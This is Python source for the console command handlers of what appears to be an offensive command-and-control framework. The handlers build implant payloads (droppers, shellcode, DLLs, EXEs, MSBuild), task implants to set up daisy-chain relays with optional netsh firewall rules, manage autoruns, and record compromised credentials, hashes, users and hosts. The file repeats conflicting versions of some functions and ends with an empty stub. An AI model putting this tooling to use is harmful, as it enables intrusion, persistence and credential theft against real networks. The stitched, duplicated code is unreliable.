def do_get_opsec_events(user, command):
    """Print every recorded OpSec event as a whitespace-separated table.

    Args:
        user: console user issuing the command (unused; kept for the common
            ``do_*(user, command)`` handler signature).
        command: raw command line (unused).

    Each row returned by ``get_opsec_events()`` is read positionally as
    (ID, Date, Owner, Event, Note). Nothing is printed when there are no
    events; the "Press Enter" pause and the screen clear always run.
    """
    rows = get_opsec_events()
    if rows:
        header = "ID  Date  Owner  Event  Note \n"
        body = "".join(
            "%s  %s  %s  %s  %s \n" % (row[0], row[1], row[2], row[3], row[4])
            for row in rows
        )
        print_good(header + body)
    input("Press Enter to continue...")
    clear()
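def do_add_autorun(user, command):
    """Register a module/command to be auto-run against new implants.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line, ``add-autorun <module or command>``.

    The ``add-autorun`` keyword is stripped and the remainder is stored via
    ``add_autorun``. A missing or whitespace-only argument is rejected; the
    original only caught the exact string ``add-autorun``, so ``add-autorun ``
    (trailing space) stored an empty autorun entry.
    """
    autorun = command.replace("add-autorun ", "")
    autorun = autorun.replace("add-autorun", "").strip()
    if not autorun:
        print_bad("Please specify a module to autorun")
        return
    add_autorun(autorun)
    print_good("add-autorun: %s\r\n" % autorun)
    input("Press Enter to continue...")
    clear()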
def do_set_killdate(user, command):
    """Update the C2 server KillDate from ``set-killdate yyyy-MM-dd``.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line; the ``set-killdate`` keyword is stripped
            and the rest is validated with ``validate_killdate``.

    On success the value is written to the ``KillDate`` column of
    ``C2Server``; existing payloads keep their old date, hence the reminder
    in the success message.
    """
    requested = command.replace("set-killdate ", "").replace("set-killdate", "").strip()
    if validate_killdate(requested):
        update_item("KillDate", "C2Server", requested)
        print_good("Updated KillDate (Remember to generate new payloads and get new implants): %s\r\n" % requested)
    else:
        print_bad("Invalid killdate format, please specify a killdate in format yyyy-MM-dd")
    input("Press Enter to continue...")
    clear()
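def do_set_defaultbeacon(user, command):
    """Update the C2 server default beacon/sleep from ``set-defaultbeacon <time>``.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line; the keyword is stripped and the remainder
            (e.g. ``50s``, ``10m``, ``1h``) is checked by ``validate_sleep_time``.

    Fix relative to the original: the value is ``strip()``-ed like
    ``do_set_killdate`` does, so ``set-defaultbeacon 10m `` no longer stores
    (or rejects) a value with surrounding whitespace.
    """
    new_sleep = command.replace("set-defaultbeacon ", "")
    new_sleep = new_sleep.replace("set-defaultbeacon", "").strip()
    if not validate_sleep_time(new_sleep):
        print_bad("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
    else:
        update_item("DefaultSleep", "C2Server", new_sleep)
        print_good("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
    input("Press Enter to continue...")
    clear()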
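def do_createdaisypayload(user, command):
    """Interactively build payloads that call back through an existing daisy host.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused; every value is prompted).

    Prompts for a payload name, the daisy URL(s) and the ID of the implant
    hosting the daisy, then writes the payload family (droppers, shellcode,
    raw, DLLs, EXE, MSBuild, donut, dynamic) under ``PayloadsDirectory``
    with ``<name>_`` as the file prefix.

    Changes relative to the original handler:
      * aborts with a message when ``get_implantbyid`` returns nothing for
        the entered ID (the original hit ``AttributeError`` on
        ``daisyhost.User`` only after all prompts had been answered);
      * the ``daisyhostheader`` loop was dropped — its result was never used.

    NOTE(review): ``new_urldetails`` is given the server-wide
    ``C2.PayloadCommsHost``/``DomainFrontHeader`` rather than the daisy URL
    entered here; left unchanged because the meaning of that URL row is not
    visible from this function.
    """
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    # Normalise 127.0.0.1 to localhost before the URL is embedded in the payload.
    if "http://127.0.0.1" in daisyurl:
        daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
    if "https://127.0.0.1" in daisyurl:
        daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    if daisyhost is None:
        print_bad("No implant found with ID: %s" % daisyhostid)
        input("Press Enter to continue...")
        clear()
        return
    # Disable any proxy in the PowerShell dropper unless $proxyurl is set.
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    pbindsecret = PBindSecret
    pbindpipename = PBindPipeName

    # string_to_array renders the comma-separated input as the array literal
    # used inside the dropper; the count is not needed here.
    daisyurl, _daisyurl_count = string_to_array(daisyurl)

    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
                           "", "", "")
    newPayload = Payloads(C2.KillDate,
                          C2.EncKey,
                          C2.Insecure,
                          C2.UserAgent,
                          C2.Referrer,
                          "%s?d" % get_newimplanturl(),
                          PayloadsDirectory,
                          PowerShellProxyCommand=proxynone,
                          URLID=urlId,
                          PBindPipeName=pbindpipename,
                          PBindSecret=pbindsecret)
    # Tag the dropper with the daisy host's user@domain in place of the URL
    # marker so the resulting implant is attributable to its daisy.
    newPayload.PSDropper = (newPayload.PSDropper).replace(
        "$pid;%s" % (daisyurl),
        "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
    prefix = "%s_" % name
    newPayload.CreateDroppers(prefix)
    newPayload.CreateShellcode(prefix)
    newPayload.CreateRaw(prefix)
    newPayload.CreateDlls(prefix)
    newPayload.CreateEXE(prefix)
    newPayload.CreateMsbuild(prefix)
    newPayload.CreateDonutShellcode(prefix)
    newPayload.BuildDynamicPayloads(prefix)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()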
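def do_createnewpayload(user, command, creds=None):
    """Interactively create a payload set for a new comms URL / domain front.

    Args:
        user: console user; passed to ``get_creds_from_params`` for
            ``-credid`` lookups.
        command: raw command line; ``-credid <id>`` selects stored proxy
            credentials, otherwise proxy user/password are prompted when a
            proxy URL is given.
        creds: accepted for signature compatibility but reset to ``None`` on
            entry (as in the original); only ``-credid`` populates it.

    Fix relative to the original handler: the proxy user built from stored
    credentials used a format string with no conversion specifiers
    (``"******" % (domain, user)``), which raises ``TypeError`` whenever
    ``-credid`` is used. It is now rendered as ``domain\\user``, the form
    the interactive prompt asks for. The unused ``domain`` local was dropped.

    NOTE(review): the proxy password is read with ``input()`` (echoed on the
    console) and persisted in clear by ``new_urldetails``; the C2 settings
    are read positionally (``C2[5]`` …), so any column change breaks this.
    """
    params = re.compile("createnewpayload ", re.IGNORECASE)
    params = params.sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return

    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Comms URL: https://www.example.com ")
    domainfront = input("Domain front hostname: jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")

    randomid = randomuri(5)
    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            # domain\user, matching the "Proxy User: e.g. Domain\user" prompt.
            proxyuser = f"{creds['Domain']}\\{creds['Username']}"
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
        credsexpire = input(
            Colours.GREEN +
            "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        # "?p" marks a proxy-aware implant URL.
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()
    newPayload = Payloads(C2[5], C2[2], comms_url, domainfront, C2[8],
                          proxyuser, proxypass, proxyurl, "", "", C2[17],
                          C2[18], C2[19], imurl, PayloadsDirectory)
    prefix = "%s_" % name
    newPayload.CreateRaw(prefix)
    newPayload.CreateDlls(prefix)
    newPayload.CreateShellcode(prefix)
    newPayload.CreateEXE(prefix)
    newPayload.CreateMsbuild(prefix)
    newPayload.CreatePython(prefix)
    newPayload.CreateCS(prefix)
    new_urldetails(randomid, comms_url, domainfront, proxyurl, proxyuser,
                   proxypass, credsexpire)
    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()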
def do_tasks(user, command):
    """List queued (not yet collected) tasks, one line per task.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    Each line is ``[ImplantID] : Domain\\User | command``; the implant row
    from ``get_implantdetails`` is read positionally ([0] id, [2] user,
    [11] domain). ``get_newtasks_all()`` returning ``None`` means an empty
    queue.
    """
    tasks = get_newtasks_all()
    if tasks is None:
        print_good("No tasks queued!\r\n")
    else:
        lines = []
        for task in tasks:
            details = get_implantdetails(task[1])
            who = "%s\\%s" % (details[11], details[2])
            lines.append("[%s] : %s | %s\r\n" % (details[0], who, task[2]))
        print_good("Queued tasks:\r\n\r\n%s" % "".join(lines))
    input("Press Enter to continue...")
    clear()
def do_show_serverinfo(user, command):
    """Dump the C2Server configuration row to the console.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    NOTE(review): this prints secrets in clear — ``EncKey``, the default
    proxy password and the Pushover API token — so be mindful of shared or
    logged consoles.
    """
    C2 = get_c2server_all()
    fields = [
        ("PayloadCommsHost", C2.PayloadCommsHost),
        ("EncKey", C2.EncKey),
        ("DomainFrontHeader", C2.DomainFrontHeader),
        ("DefaultSleep", C2.DefaultSleep),
        ("KillDate", C2.KillDate),
        ("GET_404_Response", C2.GET_404_Response),
        ("PoshProjectDirectory", C2.PoshProjectDirectory),
        ("QuickCommand", C2.QuickCommand),
        ("DownloadURI", C2.DownloadURI),
        ("DefaultProxyURL", C2.ProxyURL),
        ("DefaultProxyUser", C2.ProxyUser),
        ("DefaultProxyPass", C2.ProxyPass),
        ("URLS", C2.URLS),
        ("SocksURLS", C2.SocksURLS),
        ("Insecure", C2.Insecure),
        ("UserAgent", C2.UserAgent),
        ("Referer", C2.Referrer),
        ("Pushover_APIToken", C2.Pushover_APIToken),
        ("Pushover_APIUser", C2.Pushover_APIUser),
        ("EnableNotifications", C2.EnableNotifications),
    ]
    # Leading newline, then one "Label: value" line per field (each "\n"-terminated).
    detailsformatted = "\n" + "".join("%s: %s\n" % (label, value) for label, value in fields)
    print_good(detailsformatted)
    input("Press Enter to continue...")
    clear()
def do_tasks(user, command):
    """List queued (not yet collected) tasks, one line per task.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    Each line is ``[ImplantID] : Domain\\User | Command : TaskID``.
    ``get_newtasks_all()`` returning ``None`` means an empty queue.
    """
    tasks = get_newtasks_all()
    if tasks is None:
        print_good("No tasks queued!\r\n")
    else:
        lines = []
        for task in tasks:
            details = get_implantdetails(task.RandomURI)
            lines.append(
                f"[{details.ImplantID}] : {details.Domain}\\{details.User} | {task.Command} : {task.TaskID}\r\n"
            )
        print_good("Queued tasks:\r\n\r\n%s" % "".join(lines))
    input("Press Enter to continue...")
    clear()
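def do_opsec(user, command):
    """Print an OpSec summary: users/hosts touched, C2 URLs, uploads, creds.

    Args:
        user: console user; passed through to ``do_get_opsec_events``.
        command: raw command line; passed through unchanged.

    Hosts come from implant hostnames plus any ``invoke-pbind -target`` host
    whose output contained "connected"; uploads are parsed from
    "uploading file", "installing persistence" and "written scf file" task
    text. The summary block is only printed when there are completed tasks.

    Fixes relative to the original handler:
      * the loop variable no longer shadows the ``command`` parameter, so
        ``do_get_opsec_events`` receives the caller's command rather than
        the last task's text;
      * ``re.search`` returning ``None`` (an ``invoke-pbind`` line without
        ``-target``) no longer raises ``TypeError``;
      * a persistence line without ``:`` no longer raises ``IndexError``;
      * ``parse_creds(get_creds())`` runs once instead of once per task.

    NOTE(review): the URL table echoes the stored proxy password (column
    ``i[6]``) to the console.
    """
    implants = get_implants_all()
    comtasks = get_tasks()
    hosts = ""
    uploads = ""
    urls = get_c2urls()
    urlformatted = "ID  Name  URL  HostHeader  ProxyURL  ProxyUsername  ProxyPassword  CredentialExpiry\n"
    for i in urls:
        urlformatted += "%s  %s  %s  %s  %s  %s  %s  %s \n" % (
            i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7])
    users = ""
    if implants:
        for implant in implants:
            if implant.Hostname not in hosts:
                hosts += "%s \n" % implant.Hostname
    if comtasks:
        for task in comtasks:
            implant = get_implantdetails(task[1])
            task_command = task[2].lower()
            output = (task[3] or "").lower()
            if implant.User not in users:
                users += "%s\\%s @ %s\n" % (implant.Domain, implant.User,
                                            implant.Hostname)
            if "invoke-pbind" in task_command and "connected" in output:
                tg = re.search("(?<=-target )\\S*", str(task_command))
                if tg and tg[0] not in hosts:
                    hosts += "%s \n" % tg[0]
            if "uploading file" in task_command:
                uploadedfile = task_command.partition("uploading file: ")[2].strip()
                filehash = uploadedfile.partition(" with md5sum:")[2].strip()
                uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
                uploadedfile = uploadedfile.strip('"')
                uploads += "%s\t%s\t%s\n" % (implant.User, filehash,
                                             uploadedfile)
            if "installing persistence" in output:
                line = task_command.replace('\n', '').replace('\r', '')
                # Text after the first ":" (empty when there is none).
                filenameuploaded = line.rstrip().partition(":")[2]
                uploads += "%s %s \n" % (implant.User, filenameuploaded)
            if "written scf file" in output:
                uploads += "%s %s \n" % (implant.User, output)
        creds, hashes = parse_creds(get_creds())
        print_good(
            "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
            % (users, hosts, urlformatted, uploads, creds, hashes))
    print_good("\nOpSec Events:")
    do_get_opsec_events(user, command)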
def do_insert_opsec_events(user, command):
    """Prompt for and store one OpSec event (timestamp, event text, note).

    Args:
        user: console user, recorded as the event owner.
        command: raw command line; passed through to ``do_get_opsec_events``.

    The timestamp defaults to the current local time (naive
    ``datetime.now()``) in ``yyyy-mm-dd HH:MM``; an invalid entry aborts
    without storing anything.
    """
    fmt = "%Y-%m-%d %H:%M"
    now_text = datetime.now().strftime(fmt)
    entered = input(f"Timestamp: (Press Enter for {now_text}) ").strip()
    timestamp = entered or now_text
    if not validate_timestamp_string(timestamp, fmt):
        print_bad("Please enter a valid timestamp in format yyyy-mm-dd HH:MM")
        input("Press Enter to continue...")
        clear()
        return
    event = input("Event: ")
    note = input("Notes: ")
    insert_opsec_event(timestamp, user, event, note)
    print_good("Event added successfully")
    do_get_opsec_events(user, command)
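def do_opsec(user, command):
    """Print an OpSec summary built from implants and completed tasks.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    Sections: users compromised (domain\\user @ host), hosts compromised
    (implant hostnames plus ``invoke-pbind -target`` hosts that reported
    "connected"), implant URLs, files uploaded / persistence / SCF writes,
    and credentials/hashes from the creds store. Implant rows are read
    positionally ([2] user, [3] hostname, [9] URL, [11] domain).

    Fixes relative to the original handler:
      * ``output.indexof(':')`` is not a ``str`` method and raised
        ``AttributeError`` on every "written scf file" line; the slice now
        uses ``str.find`` and falls back to the whole line when no colon is
        present;
      * the persistence and SCF branches re-queried the implant with ``t[2]``
        (the command text) instead of the RandomURI in ``t[1]``; they now
        reuse the details already fetched for the task;
      * ``re.search`` returning ``None`` no longer raises;
      * ``parse_creds(get_creds())`` runs once, after the loop, so the
        summary no longer fails with ``NameError`` when there are no tasks;
      * a persistence line without ``:`` no longer raises ``IndexError``;
      * the loop variable no longer shadows the ``command`` parameter.
    """
    implants = get_implants_all()
    comtasks = get_tasks()
    hosts = ""
    uploads = ""
    urls = ""
    users = ""
    for i in implants or []:
        if i[3] not in hosts:
            hosts += "%s \n" % i[3]
        if i[9] not in urls:
            urls += "%s \n" % i[9]
    for t in comtasks or []:
        details = get_implantdetails(t[1])
        task_command = t[2].lower()
        output = (t[3] or "").lower()
        if details[2] not in users:
            users += "%s\\%s @ %s\n" % (details[11], details[2], details[3])
        if "invoke-pbind" in task_command and "connected" in output:
            tg = re.search("(?<=-target )\\S*", str(task_command))
            if tg and tg[0] not in hosts:
                hosts += "%s \n" % tg[0]
        if "uploading file" in task_command:
            uploadedfile = task_command.partition("uploading file: ")[2].strip()
            filehash = uploadedfile.partition(" with md5sum:")[2].strip()
            uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
            uploadedfile = uploadedfile.strip('"')
            uploads += "%s\t%s\t%s\n" % (details[3], filehash, uploadedfile)
        if "installing persistence" in output:
            line = task_command.replace('\n', '').replace('\r', '')
            # Text after the first ":" (empty when there is none).
            filenameuploaded = line.rstrip().partition(":")[2]
            uploads += "%s %s \n" % (details[3], filenameuploaded)
        if "written scf file" in output:
            colon = output.find(':')
            scf_detail = output[colon:] if colon >= 0 else output
            uploads += "%s %s\n" % (details[3], scf_detail)
    creds, hashes = parse_creds(get_creds())
    print_good(
        "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
        % (users, hosts, urls, uploads, creds, hashes))
    input("Press Enter to continue...")
    clear()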
def do_add_hosted_file(user, command):
    """Interactively register a local file to be served at a URI by the C2 web server.

    Args:
        user: console user; passed through to ``do_show_hosted_files``.
        command: raw command line; passed through to ``do_show_hosted_files``.

    Content type defaults to ``text/html``; the Base64 choice is stored as
    the strings ``"Yes"``/``"No"``; the final ``"Yes"`` argument to
    ``insert_hosted_file`` is passed as in the original (its meaning is not
    visible here). Both FilePath and URI are required.

    NOTE(review): the file path is not checked for existence or readability
    here, and nothing restricts which server-side path can be exposed — the
    operator is trusted.
    """
    file_path = input("File Path: .e.g. /tmp/application.docx: ")
    uri = input("URI Path: .e.g. /downloads/2020/application: ")
    content_type = input("Content Type: .e.g. (text/html): ") or "text/html"
    encode_flag = "Yes" if no_yes_prompt("Base64 Encode File") else "No"
    if not (uri and file_path):
        print_bad("Please enter a FilePath and URI")
        input("Press Enter to continue...")
        clear()
        return
    insert_hosted_file(uri, file_path, content_type, encode_flag, "Yes")
    first_url = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
    print_good("Added hosted-file \n\n%s%s -> %s (%s)\r\n" % (first_url, uri, file_path, content_type))
    do_show_hosted_files(user, command)
    clear()
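def do_createproxypayload(user, command, creds=None):
    """Set the server-wide proxy settings and create the "Proxy" payload set.

    Args:
        user: console user; passed to ``get_creds_from_params`` for
            ``-credid`` lookups.
        command: raw command line; ``-credid <id>`` selects stored proxy
            credentials, otherwise user/password are prompted.
        creds: accepted for signature compatibility but reset to ``None`` on
            entry (as in the original); only ``-credid`` populates it.

    The proxy URL/user/password are written to the ``C2Server`` table before
    the payloads are generated, so they become the defaults for later
    payloads too.

    Fix relative to the original handler: the proxy user built from stored
    credentials used a format string with no conversion specifiers
    (``"******" % (domain, user)``), which raises ``TypeError`` whenever
    ``-credid`` is used. It is now rendered as ``domain\\user``, the form the
    interactive prompt asks for.

    NOTE(review): the password is read with ``input()`` (echoed) and stored
    in clear in ``C2Server`` and the URL row; C2 settings are read
    positionally (``C2[5]`` …).
    """
    params = re.compile("createproxypayload ", re.IGNORECASE)
    params = params.sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    if creds is not None:
        # domain\user, matching the "Proxy User: e.g. Domain\user" prompt.
        proxyuser = f"{creds['Domain']}\\{creds['Username']}"
        proxypass = creds['Password']
    else:
        proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
        proxypass = input("Proxy Password: e.g. Password1 ")
    proxyurl = input(Colours.GREEN +
                     "Proxy URL: .e.g. http://10.150.10.1:8080 ")
    credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
    update_item("ProxyURL", "C2Server", proxyurl)
    update_item("ProxyUser", "C2Server", proxyuser)
    update_item("ProxyPass", "C2Server", proxypass)
    C2 = get_c2server_all()
    newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13],
                          C2[11], "", "", C2[19], C2[20], C2[21],
                          "%s?p" % get_newimplanturl(), PayloadsDirectory)
    newPayload.CreateRaw("Proxy")
    newPayload.CreateDlls("Proxy")
    newPayload.CreateShellcode("Proxy")
    newPayload.CreateEXE("Proxy")
    newPayload.CreateMsbuild("Proxy")
    newPayload.CreateCS("Proxy")
    new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass,
                   credsexpire)
    print_good("Created new proxy payloads")
    input("Press Enter to continue...")
    clear()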
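def do_creds(user, command):
    """Add, search or list stored credentials.

    Args:
        user: console user (unused; common handler signature).
        command: one of ``creds -add -domain=D -username=U (-password=P | -hash=H)``,
            ``creds -search <username>``, or plain ``creds``.

    Each ``-flag=value`` is read up to the next whitespace, so a password
    containing a space cannot be supplied this way (unchanged behaviour).
    Exactly one of password or hash must be given for ``-add``.

    Changes relative to the original: the duplicated ``-password`` regex
    block (a second, identical search in the ``else`` branch) was removed,
    the four flag lookups share one helper, and the local ``hash`` no longer
    shadows the builtin. Error paths return without the usual pause, as before.
    """
    if "-add " in command:
        def flag_value(flag):
            # Value after ``-<flag>=`` up to the next whitespace; None when absent.
            match = re.search(r"-%s=([^\s]*)" % flag, command)
            return match.group(1) if match else None

        domain = flag_value("domain")
        username = flag_value("username")
        password = flag_value("password")
        cred_hash = flag_value("hash")
        if not domain or not username:
            print_bad("Please specify a domain and username")
            return
        if password and cred_hash:
            print_bad("Please specify a password or a hash, but not both")
            return
        if not password and not cred_hash:
            print_bad("Please specify either a password or a hash")
            return
        insert_cred(domain, username, password, cred_hash)
        print_good("Credential added successfully")
        return
    elif "-search " in command:
        username = command.replace("creds ", "")
        username = username.replace("-search ", "")
        username = username.strip()
        creds, hashes = parse_creds(get_creds_for_user(username))
        print_good("Credentials Compromised: \n%s\nHashes Compromised: \n%s" %
                   (creds, hashes))
        return
    else:
        creds, hashes = parse_creds(get_creds())
        print_good(
            "\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" %
            (creds, hashes))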
def do_cleartasks(user, command):
    """Drop every queued task, then pause and clear the screen.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    Destructive and unconfirmed: ``drop_newtasks()`` runs immediately.
    """
    drop_newtasks()
    confirmation = "Emptied tasks queue\r\n"
    print_good(confirmation)
    input("Press Enter to continue...")
    clear()
def do_turnon_notifications(user, command):
    """Set ``EnableNotifications`` to ``"Yes"`` in the C2Server table.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).
    """
    update_item("EnableNotifications", "C2Server", "Yes")
    status = "Turned on notifications on new implant"
    print_good(status)
    input("Press Enter to continue...")
    clear()
def do_nuke_autoruns(user, command):
    """Delete every configured autorun, then pause and clear the screen.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    Destructive and unconfirmed: ``del_autoruns()`` runs immediately.
    """
    del_autoruns()
    confirmation = "nuked autoruns\r\n"
    print_good(confirmation)
    input("Press Enter to continue...")
    clear()
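def do_del_autorun(user, command):
    """Delete one autorun entry named on the command line.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line, ``del-autorun <autorun>``.

    Fix relative to the original: a bare ``del-autorun`` (no argument) used
    to pass the literal string ``"del-autorun"`` to ``del_autorun``; it is now
    rejected, mirroring ``do_add_autorun``. The argument is also
    ``strip()``-ed so surrounding whitespace does not prevent a match.
    """
    autorun = command.replace("del-autorun ", "")
    autorun = autorun.replace("del-autorun", "").strip()
    if not autorun:
        print_bad("Please specify an autorun to delete")
        return
    del_autorun(autorun)
    print_good("deleted autorun\r\n")
    input("Press Enter to continue...")
    clear()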
def do_list_autoruns(user, command):
    """Print the configured autoruns as returned by ``get_autorun()``.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).
    """
    listing = get_autorun()
    print_good(listing)
    input("Press Enter to continue...")
    clear()
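def do_startdaisy(user, command, randomuri):
    """Interactively task an implant to start a daisy-chain relay, optionally
    generating payloads that call back through it.

    Args:
        user: console user, recorded as the task owner.
        command: raw command line (unused; the task text is rebuilt here).
        randomuri: RandomURI of the implant that will host the daisy.

    Fixes relative to the original handler:
      * the "Are you elevated?" answer is evaluated once. Previously any
        answer other than exactly ``y``/``n``/blank (e.g. ``yes``) was
        treated as elevated when asking for a bind IP but as *not* elevated
        when finishing the task, so the task got ``-localhost`` even though a
        non-localhost bind IP had been collected;
      * the proxy URL/user/password are emitted as single-quoted literals;
        an embedded ``'`` is doubled so the value cannot terminate the
        literal and corrupt the rest of the ``invoke-daisychain`` line (the
        loaded module is a ``.ps1``, so PowerShell quoting rules are assumed).

    NOTE(review): the proxy password travels in clear inside the task text
    and is stored by ``new_urldetails``; ``bind_ip``/``bind_port`` are not
    validated here.
    """
    def ps_literal(value):
        # PowerShell single-quoted literal; a literal ' is written as ''.
        return "'" + str(value).replace("'", "''") + "'"

    check_module_loaded("invoke-daisychain.ps1", randomuri, user)

    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
    # Blank/Enter means "yes" (the Y/n default); only an explicit "n" is unelevated.
    is_elevated = elevated.strip().lower() != "n"

    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    cred_expiry = ""

    if not is_elevated:
        cont = input(
            Colours.RED +
            "Daisy from an unelevated context can only bind to localhost, continue? y/N "
            + Colours.END)
        if cont.lower() == "n" or cont == "":
            return

        bind_ip = "localhost"

    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " +
                        Colours.END)

    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " +
                      Colours.END)
    firstdaisy = input(Colours.GREEN +
                       "Is this the first daisy in the chain? Y/n? " +
                       Colours.END)
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    default_df_header = get_first_dfheader(DomainFrontHeader)
    # A domain-front header equal to the URL itself means "no front header".
    if default_df_header == default_url:
        default_df_header = None
    if firstdaisy.lower() == "y" or firstdaisy == "":
        upstream_url = input(Colours.GREEN +
                             f"C2 URL (leave blank for {default_url}): " +
                             Colours.END)
        domain_front = input(
            Colours.GREEN +
            f"Domain front header (leave blank for {str(default_df_header)}): "
            + Colours.END)
        proxy_user = input(
            Colours.GREEN +
            "Proxy user (<domain>\\<username>, leave blank if none): " +
            Colours.END)
        proxy_pass = input(Colours.GREEN +
                           "Proxy password (leave blank if none): " +
                           Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " +
                          Colours.END)
        cred_expiry = input(
            Colours.GREEN +
            "Password/Account Expiration Date: .e.g. 15/03/2018: ")

        if not upstream_url:
            upstream_url = default_url
        if not domain_front:
            domain_front = default_df_header or ""

    else:
        # Chained daisy: the upstream is another daisy, reached over plain HTTP.
        upstream_daisy_host = input(Colours.GREEN +
                                    "Upstream daisy server:  " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port:  " +
                                    Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"

    task = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"

    if domain_front:
        task += f" -domfront {domain_front}"
    if proxy_url:
        task += f" -proxyurl {ps_literal(proxy_url)}"
    if proxy_user:
        task += f" -proxyuser {ps_literal(proxy_user)}"
    if proxy_pass:
        task += f" -proxypassword {ps_literal(proxy_pass)}"

    if is_elevated:
        firewall = input(Colours.GREEN +
                         "Add firewall rule? (uses netsh.exe) y/N: ")
        # Default (blank) is "no rule".
        if firewall.lower() == "n" or firewall == "":
            task += " -nofwrule"

    else:
        print_good(
            "Not elevated so binding to localhost and not adding firewall rule"
        )
        task += " -localhost"

    urls = get_allurls()
    task += f" -urls '{urls}'"
    new_task(task, user, randomuri)
    update_label("DaisyHost", randomuri)

    createpayloads = input(
        Colours.GREEN +
        "Would you like to create payloads for this Daisy Server? Y/n ")

    if createpayloads.lower() == "y" or createpayloads == "":

        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)

        daisyhost = get_implantdetails(randomuri)
        # Disable any proxy in the PowerShell dropper unless $proxyurl is set.
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"",
                               "\"\"", proxy_url, proxy_user, proxy_pass,
                               cred_expiry)
        newPayload = Payloads(C2.KillDate,
                              C2.EncKey,
                              C2.Insecure,
                              C2.UserAgent,
                              C2.Referrer,
                              "%s?d" % get_newimplanturl(),
                              PayloadsDirectory,
                              URLID=urlId,
                              PowerShellProxyCommand=proxynone)
        # Tag the dropper with the daisy host's user@domain in place of the
        # upstream URL marker so the implant is attributable to its daisy.
        newPayload.PSDropper = (newPayload.PSDropper).replace(
            "$pid;%s" % (upstream_url),
            "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
        newPayload.CreateDroppers(name)
        newPayload.CreateRaw(name)
        newPayload.CreateDlls(name)
        newPayload.CreateShellcode(name)
        newPayload.CreateEXE(name)
        newPayload.CreateMsbuild(name)
        print_good("Created new %s daisy payloads" % name)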
def do_get_killdate(user, command):
    """Print the current ``KillDate`` from the C2Server table.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).
    """
    current = select_item("KillDate", "C2Server")
    print_good(f"KillDate: {current}")
    input("Press Enter to continue...")
    clear()
def do_opsec(user, command):
    """Print the OpSec summary string, then the OpSec event table.

    Args:
        user: console user; forwarded to both helpers.
        command: raw command line; forwarded to both helpers.
    """
